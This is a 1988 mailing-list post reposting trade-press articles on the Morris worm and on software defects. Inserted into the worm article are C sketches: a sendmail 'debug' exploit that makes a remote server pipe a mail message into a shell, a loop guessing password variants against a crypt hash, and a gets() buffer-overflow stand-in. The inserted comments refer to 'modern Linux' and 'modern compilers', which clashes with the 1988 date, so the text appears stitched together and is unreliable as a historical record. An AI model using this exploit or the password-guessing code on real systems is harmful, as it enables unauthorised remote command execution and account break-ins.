christevt%amsp6.decnet@WPAFB-AMS1.ARPA ("AMSP6::CHRISTEVT") (12/13/88)
I N T E R O F F I C E M E M O R A N D U M
Date: 12-Dec-1988 14:22
From: Victor ET Christensen
CHRISTEVT
Dept:
Tel No:
TO: _MAILER! ( _DDN[VIRUS-L%LEHIIBM1.BITNET@CUNYVM.CUNY.EDU] )
TO: _MAILER! ( _DDN[ETHICS-L%POLYGRAF.BITNET@CUNYVM.CUNY.EDU] )
TO: _MAILER! ( _DDN[TCP-IP@SRI-NIC.ARPA] )
Subject: Virus and ethics articles
OK, folks, I got permission to send these out...I hope they're not too
out of date! These have been posted to VIRUS-L, ETHICS-L and TCP-IP...
For both:
Government Computer News
8601 Georgia Avenue, Suite 300
Silver Spring, MD 20910
(301) 650-2000
November 21, 1988
Volume 7 Number 24
Copyright 1988 Ziff-Davis Publishing Company
Cover and page 100:
"BIG GUNS TAKE AIM AT VIRUS"
by Neil Munro, GCN Staff
"In the aftermath of the most recent virus infection of the Defense Data
Network and Arpanet, Defense Department and National Institute of Standards
and Technology computer security officials are scrambling to head off further
attacks.
"Officials of the facilities struck by the virus met this month to
discuss its nature and impact. The meeting at National Security Agency
headquarters in Fort Meade, Md., included representatives of NSA and NIST as
'observers,' according to NIST computer security chief Stuart Katzke.
"Two days later, NSA and NIST officials met again to discuss how to
avert future infections, Katzke said. Katzke, who attended both meetings, said
no decisions had been reached on how to combat viruses, and NSA and NIST
representatives will meet again to firm up recommendations.
"Katzke, however, suggested one solution would be the formation of a
federal center for anti-virus efforts, operated jointly by NSA's National
Computer Security Center (NCSC) and NIST.
"The center would include a clearinghouse that would collect and
disseminate information about threats, such as flaws in operating systems, and
solutions. However, funding and personnel for the center are a problem, he
said, because NIST does not have funds for such a facility.
"The center also would help organize responses to emergencies by quickly
warning users of new threats and defenses against them, he said. People with
solutions to a threat could transmit their answers through the center to
threatened users, he said. A database of experts would be created to speed
response to immediate threats.
"The center would develop means of correcting flaws in software, such as
trapdoors in operating systems. Vendors would be asked to develop and field
solutions, he said.
"NIST would work on unclassified systems and the NCSC would work on
secure military systems, he said. Information learned about viruses from
classified systems might be made available to the public through the
clearinghouse, Katzke said, although classified information would have to be
removed first.
"Although the virus that prompted these meetings did not try to destroy
data, it made so many copies of itself that networks rapidly became clogged,
greatly slowing down communications. Across the network, computer systems
crashed as the virus continuously replicated itself.
"During a Pentagon press conference on the virus outbreak, Raymond
Colladay, director of the Defense Advanced Research Projects Agency (DARPA),
said the virus hit 'several dozen' installations out of 300 on the agency's
unclassified Arpanet network.
"Thousands Affected
"The virus also was found in Milnet, which is the unclassified portion
of the Defense Data Network. Estimates of how many computers on the network
were struck varied from 6,000 to 250,000. The virus did not affect any
classified systems, DOD officials said.
"The virus hit DARPA computers in Arlington, Va., and the Lawrence
Livermore Laboratories in California as well as many academic institutions,
Colladay said. It also affected the Naval Ocean Systems Command in San Diego
and the Naval Research Laboratory in Maryland, a Navy spokesman said.
"Written in C and aimed at the UNIX operating system running on Digital
Equipment Corp. VAX and Sun Microsystems Inc. computers, the virus was
released Nov. 2 into Arpanet through a computer at the Massachusetts Institute
of Technology in Cambridge, Mass.
"The Virus apparently was intended to demonstrate the threat to
networked systems. Published reports said the virus was developed and
introduced by a postgraduate student at Cornell University who specializes in
computer security. The FBI has interviewed the student.
"Clifford Stoll, a computer security expert at Harvard University who
helped identify and neutralize the virus, said the virus was about 40
kilobytes long and took 'several weeks' to write. It replicated itself in
three ways.
"Spreading the Virus
"The first method exploited a little-known trapdoor in the Sendmail
electronic-mail routine of Berkeley UNIX 4.3, Stoll said. The trapdoor was
created by a programmer who wanted to remove some bugs, various reports said.
However, the programmer forgot to remove the trapdoor in the final production
version. In exploiting this routine, the virus tricked the Sendmail program
into distributing numerous copies of the virus across the network.
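If you're wondering how that Sendmail trick worked: with the leftover 'debug'
command switched on, a remote machine could name a shell pipeline as the mail
recipient, and the body of the message would be fed straight into that shell.
Here's a rough C sketch of the idea - NOT the worm's actual code; the host
name and the payload line are made up for illustration:

/* Rough sketch of abusing the leftover sendmail "debug" command.
 * Hypothetical host and payload, NOT the worm's actual code. */
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

static void send_line(int fd, const char *s)
{
    write(fd, s, strlen(s));
    write(fd, "\r\n", 2);
}

int main(void)
{
    struct hostent *hp = gethostbyname("victim.example.com");  /* hypothetical */
    struct sockaddr_in sin;
    int fd;

    if (hp == NULL || (fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        return 1;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(25);                         /* SMTP port */
    memcpy(&sin.sin_addr, hp->h_addr_list[0], hp->h_length);
    if (connect(fd, (struct sockaddr *)&sin, sizeof sin) < 0)
        return 1;

    send_line(fd, "debug");                           /* the forgotten trapdoor */
    send_line(fd, "mail from: </dev/null>");
    /* In debug mode the recipient may be a command pipeline; the "message"
     * that follows is then piped into a shell on the receiving machine.   */
    send_line(fd, "rcpt to: <\"| sed '1,/^$/d' | /bin/sh; exit 0\">");
    send_line(fd, "data");
    send_line(fd, "echo a bootstrap program would be compiled and run here");
    send_line(fd, ".");
    send_line(fd, "quit");
    close(fd);
    return 0;
}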
"Another method used by the virus was an assembly language program that
found user names and then tried simple variations to crack poorly conceived
passwords and break into more computers, Stoll said.
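The "simple variations" attack is easy to picture: take an account name out
of /etc/passwd and try the obvious permutations against the stored password
hash through crypt(3). A small sketch of the idea - the account name, the
hash and the guess list below are all made up:

/* Sketch of guessing simple variations of an account name against its
 * one-way password hash.  The user name and hash are hypothetical.
 * crypt() is declared in <unistd.h> on BSD-era systems; modern Linux
 * wants <crypt.h> and linking with -lcrypt. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    const char *user = "smith";
    const char *hash = "abXy1examplehash";            /* made-up hash value */

    /* the name, the name doubled, the name reversed, the empty password */
    const char *guesses[] = { "smith", "smithsmith", "htims", "", NULL };

    for (int i = 0; guesses[i] != NULL; i++) {
        char *enc = crypt(guesses[i], hash);          /* hash carries the salt */
        if (enc != NULL && strcmp(enc, hash) == 0) {
            printf("%s has a guessable password: \"%s\"\n", user, guesses[i]);
            return 0;
        }
    }
    printf("no trivial variation of \"%s\" matched\n", user);
    return 1;
}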
"Yet another replication and transmission method used a widely known bug
in the Arpanet Finger program, which lets users know the last time a distant
user has signed onto a network. By sending a lengthy Finger signal, the virus
gained access to the operating systems of Arpanet hosts.
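The Finger hole is a plain unchecked-buffer bug: the finger daemon read the
request line into a fixed-size buffer with no length check, so a long enough
request wrote past the end of the buffer and, built carefully, let the sender
take over the process. A stripped-down stand-in for that pattern (not the
real fingerd source) looks like this:

/* Stand-in for the vulnerable pattern in the 4.3BSD finger daemon.
 * Illustrative only; modern compilers will rightly complain about gets(). */
#include <stdio.h>

int main(void)
{
    char line[512];     /* fixed-size request buffer */

    /* gets() never checks length: a "lengthy Finger signal" writes past
     * line[511], clobbering the stack and ultimately the return address.
     * fgets(line, sizeof line, stdin) is the bounded fix. */
    gets(line);

    printf("finger request for: %s\n", line);
    return 0;
}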
"The virus was revealed because its creator underestimated how fast the
virus would attempt to copy itself. Computers quickly became clogged as the
virus rapidly copied itself, although it succeeded only once in every 10 copy
attempts.
"Users across the country developed patches to block the virus' entrance
as soon as copies were isolated and analyzed. Many users also used Arpanet to
disseminate the countermeasures, although transmission was slowed by the
numerous virus copies in the system.
"DARPA officials 'knew precisely what the problem was,' Colladay said.
'Therefore, we knew precisely what the fix was. As soon as we had put that fix
in place, we could get back on-line.'
"Colladay said DARPA will revise security policy on the network and will
decide whether more security features should be added. The agency began a
study of the virus threat two days after the virus was released, he said.
"All observers said the Arpanet virus helped raise awareness of the
general virus threat. Several experts said it would help promote computer
security efforts. 'Anytime you have an event like this it heightens awareness
and sensitivity,' Colladay said.
"However, Katzke cautioned that viruses are less of a threat than are
access abusers and poor management practices such as inadequate disaster
protection or password control. Excellent technical anti-virus defenses are of
no use if management does not maintain proper control of the system, he said.
"Congress also is expected to respond to the virus outbreak. The
Computer Virus Eradication Act of 1988, which lapsed when Congress recessed in
October, will be reintroduced by Rep. Wally Herger (R-Calif.), according to
Doug Griggs, who is on Herger's staff."
Whew!!! Now for the next one...
Page 85:
"WHY SOFTWARE DEFECTS SO OFTEN GO UNDISCOVERED"
DP ISSUES by William E. Perry
"Much has been written recently about defects in computer software.
Defects are not new, but quantifying their frequency is new. We are beginning
to see the magnitude of the problem.
"Some researchers say we are making between 40 and 80 defects per 1,000
lines of source code. A line of source code normally is defined as an
executable line of code. A defect is a variation from specifications, no
matter how insignificant.
"Most defects are caught before the system goes into production.
However, we are told that, on average, one to three defects per 1,000 lines of
code get into production. The production defects can cause a minor
inconvenience, such as misspelling an executive's name, or wreak havoc in an
organization through the loss of large amounts of resources.
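To put those numbers in concrete terms (my arithmetic, not the column's): a
hypothetical 100,000-line system at 40 to 80 defects per 1,000 lines means
roughly 4,000 to 8,000 defects introduced during development, and at 1 to 3
per 1,000 reaching production, 100 to 300 of them are still in there waiting
for the users to find.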
"There are two kinds of defects: internal defects, which are those
uncovered by the information systems group, and external defects, which are
uncovered by end users.
"The question that needs to be asked in your organization is, 'Who
uncovers the defects?'
"The answer may determine how credible your organization is in the eyes
of your end users. The more defects uncovered by the information systems
community, the greater the credibility of that information processing
function.
"Discouraging Efforts
"But information systems personnel may be discouraged from identifying
defects, for several reasons:
"- Finding a defect may mean more work for them, not only in correcting
it but also in tracking, monitoring and retesting the corrections.
"- Frequently, there is a finger-pointing to determine who is
responsible for the defect. The game is to pin the blame on another person. An
individual held responsible for a defect can lose professional credibility and
be ridiculed by his colleagues.
"- Finally, defects can result in schedule delays or budget overruns. It
costs a lot of money to fix a defective product, and the time and effort
required could delay the project.
"Minor defects may be ignored, or defect analysis can me skipped, to
meet schedule and budget limits.
"There are also adverse consequences when defects are uncovered outside
the information systems group.
"First is the high cost of correction. Barry Boehm of TRW Inc. said the
cost of correcting a defect in production can be as much as 100 times the cost
of correcting it during development.
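In other words, a defect that might have cost $50 to fix while the code was
still on the programmer's desk can run to something like $5,000 once it is in
production and has to be found, reproduced, patched and redistributed - the
dollar figures are just my illustration of that 100-to-1 ratio.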
"Also, the information systems group may lose credibility. The end users
may look for alternative solutions, such as purchased software or
end-user-developed applications.
"Some fundamental truths have a bearing on who uncovers defects and the
effect of those defects.
"First, punishing those who detect defects in-house only tranfers the
job to external users and customers. If it is made undesirable for the author
to find defects in his own work, he won't look for them. People naturally
avoid punishment.
"Hiding the Blame
"When individuals are held to blame for defects, they tend to hide them.
For example, when an independent test group is checking the work of a software
author and the test will pinpoint blame on the author, the author will do
whatever he can to get the system through the test, so that future blame rests
on the independent test group rather than on the author.
"When individuals are encouraged to hide defects, the cause of those
defects cannot be corrected and they will recur in future systems. This is the
major consequence of blaming people, rather than processes, for defects.
"The objective of the information systems organization should be to
detect 100 percent of the application defects internally.
"All defects must be considered. These include not only defects made
because of MIS errors but also defects because of poor requirement
identification and poor design concepts. Whenever the system fails to meet the
true needs of the customer in a cost-effective manner, it should be considered
a defect.
"Information systems managers must uncover defects internally. This
means not blaming one's employees for defects uncovered during development. In
fact, it may be necessary to reward internally uncovered defects in order to
reduce externally uncovered defects."
William E. Perry is executive director, Quality Assurance Institute,
Orlando, Fla.
That's it! I hope at least some, if not all, of you found it of
interest!
ET B ME
VIC